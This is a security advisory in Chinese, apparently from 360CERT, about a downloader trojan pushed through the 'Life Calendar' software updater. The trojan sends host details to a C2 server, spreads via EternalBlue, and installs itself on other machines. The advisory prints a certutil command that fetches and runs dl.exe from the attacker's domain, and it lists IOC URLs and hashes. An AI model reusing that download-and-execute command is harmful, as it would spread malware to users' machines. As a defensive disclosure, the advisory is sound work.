原文作者：360核心安全團(tuán)隊

0x00 概述

2018年12月14日下午，360互聯(lián)網(wǎng)安全中心監(jiān)控到一批通過 “人生日歷”升級程序下發(fā)的下載器木馬，其具備遠(yuǎn)程執(zhí)行代碼功能，啟動后會將用戶計算機(jī)的詳細(xì)信息發(fā)往木馬服務(wù)器，并接收遠(yuǎn)程指令執(zhí)行下一步操作。

同時該木馬還攜帶有永恒之藍(lán)漏洞攻擊組件，可通過永恒之藍(lán)漏洞攻擊局域網(wǎng)與互聯(lián)網(wǎng)中其它機(jī)器。

360安全衛(wèi)士已在第一時間對該木馬進(jìn)行了攔截查殺，并提交廠商處理。

360CERT在此發(fā)出預(yù)警，請用戶及時做好安全防護(hù)與病毒查殺工作。

0x01 技術(shù)細(xì)節(jié)分析

2018年12月14日14時，驅(qū)動人生旗下的“人生日歷”產(chǎn)品，通過其升級組件DTLUpg.exe，開始下發(fā)執(zhí)行木馬程序

f79cb9d2893b254cc75dfb7f3e454a69.exe，18時開始木馬推送量開始擴(kuò)大，到23時我們向廠商通報了發(fā)現(xiàn)的情況，下發(fā)停止。

截止12月14日21時，該木馬累計攻擊計算機(jī)超過5.7萬臺（不包括漏洞攻擊情況，360安全衛(wèi)士帶有永恒之藍(lán)漏洞免疫功能）。

該木馬程序執(zhí)行后，會向系統(tǒng)安裝木馬服務(wù)Ddriver實現(xiàn)長期駐留，之后向服務(wù)器haqo.net發(fā)送宿主機(jī)器的詳細(xì)信息，包括如下信息：

計算機(jī)名稱

操作系統(tǒng)版本

機(jī)器軟硬件信息等

之后接收服務(wù)器返回的shellcode指令執(zhí)行。

同時該木馬具有自升級，遠(yuǎn)程下載文件執(zhí)行，遠(yuǎn)程創(chuàng)建服務(wù)等功能。

木馬在啟動后，會根據(jù)服務(wù)器指令，下載一款永恒之藍(lán)漏洞利用工具，通過該漏洞利用工具，攻擊局域網(wǎng)與互聯(lián)網(wǎng)中其它計算機(jī)，攻擊成功后，使用certutil做跳板程序，向其它機(jī)器安裝該木馬（也可以安裝其它木馬，由云端服務(wù)器決定）。

certutil  -urlcache  -split   -f   hxxp://dl.haqo.net/dl.exe  c:\install.exe&c:\install.exe&……

目前該木馬的C&C仍然活躍，收到的更多指令在繼續(xù)分析中。

上述由360核心安全團(tuán)隊提供分析。

0x02 修復(fù)方式與安全建議

及時使用360安全衛(wèi)士進(jìn)行病毒查殺（360安全衛(wèi)士具備的永恒之藍(lán)漏洞免疫功能，可保護(hù)用戶免遭該木馬攻擊）

1、做好相關(guān)重要數(shù)據(jù)備份工作

2、加強(qiáng)系統(tǒng)安全工作，及時升級軟件與安裝操作系統(tǒng)補(bǔ)丁

3、服務(wù)器暫時關(guān)閉不必要的端口（如135、139、445）

4、服務(wù)器使用高強(qiáng)度密碼，切勿使用弱口令，防止黑客暴力破解

0x03 相關(guān)IOC

hxxp://p.abbny.com/im.png

hxxp://i.haqo.net/i.png

hxxp://dl.haqo.net/eb.exez

hxxp://dl.haqo.net/dl.exe

ackng.com

74e2a43b2b7c6e258b3a3fc2516c1235

2e9710a4b9cba3cd11e977af87570e3b

f79cb9d2893b254cc75dfb7f3e454a69

93a0b974bac0882780f4f1de41a65cfd

0x04 時間線

2018-12-14 360互聯(lián)網(wǎng)安全中心監(jiān)測發(fā)現(xiàn)木馬

2018-12-15 360CERT && 360核心安全團(tuán)隊發(fā)布預(yù)警

雷峰網(wǎng)版權(quán)文章，未經(jīng)授權(quán)禁止轉(zhuǎn)載。詳情見轉(zhuǎn)載須知。